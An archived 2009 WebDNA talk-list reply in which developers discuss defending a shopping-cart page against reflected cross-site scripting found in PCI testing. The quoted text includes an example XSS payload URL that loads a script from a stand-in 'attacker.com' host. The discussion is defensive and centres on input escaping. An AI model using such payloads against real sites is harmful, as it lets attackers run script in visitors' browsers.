Re: [WebDNA] PCI Vulnerability testing

This WebDNA talk-list message is from

2009


It keeps the original formatting.
numero = 102395
interpreted = N
texte = I have no idea about a server level fix. This goes to never trusting user input. I thought it should always be surrounded by [raw] and [url] to prevent this. What do others do? Bill On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor wrote: > What are people doing for the following type of attacks? > > http://www.example.com/shoppingcart.tpl?cart="" > > I assume you could just do a [removehtml][cart][/removehtml] > > I know you can do something like that at the code level but is there > something that can be done at the server level or does the new version > cicadae have built in protections? > > More info on the attack > >> >> http://www.example.com/?var="%20SRC="http://www.attacker.com/xss.js"> >> This will exploit the reflected cross site scripting vulnerability shown >> before, executing the javascript code stored on the attacker's web server as >> if it was originating from the victim web site, www.example.com. >> A complete test will include instantiating a variable with several attack >> vectors (Check Fuzz vectors appendix and Encoded injection appendix). >> Finally, analyzing answers can get complex. A simple way to do this is to >> use code that pops up a dialog, as in our example. This typically indicates >> that an attacker could execute arbitrary JavaScript of his choice in the >> visitors' browsers. > Associated Messages, from the most recent to the oldest:

    
  1. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  2. Re: [WebDNA] PCI Vulnerability testing (Jeffrey Jones 2009)
  3. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  4. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  5. Re: [WebDNA] PCI Vulnerability testing (Jeffrey Jones 2009)
  6. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  7. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  8. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  9. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  10. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  11. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  12. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  13. Re: [WebDNA] PCI Vulnerability testing (Marc Thompson 2009)
  14. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  15. [WebDNA] PCI Vulnerability testing (Bob Minor 2009)
I have no idea about a server level fix. This goes to never trusting user input. I thought it should always be surrounded by [raw] and [url] to prevent this. What do others do? Bill On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor wrote: > What are people doing for the following type of attacks? > > http://www.example.com/shoppingcart.tpl?cart="" > > I assume you could just do a [removehtml][cart][/removehtml] > > I know you can do something like that at the code level but is there > something that can be done at the server level or does the new version > cicadae have built in protections? > > More info on the attack > >> >> http://www.example.com/?var="%20SRC="http://www.attacker.com/xss.js"> >> This will exploit the reflected cross site scripting vulnerability shown >> before, executing the javascript code stored on the attacker's web server as >> if it was originating from the victim web site, www.example.com. >> A complete test will include instantiating a variable with several attack >> vectors (Check Fuzz vectors appendix and Encoded injection appendix). >> Finally, analyzing answers can get complex. A simple way to do this is to >> use code that pops up a dialog, as in our example. This typically indicates >> that an attacker could execute arbitrary JavaScript of his choice in the >> visitors' browsers. > William DeVaul

DOWNLOAD WEBDNA NOW!

Top Articles:

Talk List

The WebDNA community talk-list is the best place to get some help: several hundred extremely proficient programmers with an excellent knowledge of WebDNA and an excellent spirit will deliver all the tips and tricks you can imagine...

Related Readings:

[tcpconnect] doing nothing- SM any help here??? (2001) Nested tags count question (1997) Dynamic Form - Shipping Country / State/ Province (2006) copyfile (2003) Date format problems (1997) I forgot (1998) [WebDNA] strip [browsername] (2016) No more misunderstanding ... yay! :) (1997) problems with 2 tags shakur (1997) ShowNext Command (1997) E-mail Attachments (1997) Emailer pref's won't save (2005) how to do multiple prices/item? (1998) Dang... Sorry, WebDNA server not running (again)? (2003) RE: WebDNA-Talk searchable? (1997) [CART] inside a [LOOP] (1997) Signal Raised (1997) Store results of GetChars? (2003) Can't test the beta (2000) WebCat NT v. Mac (1997)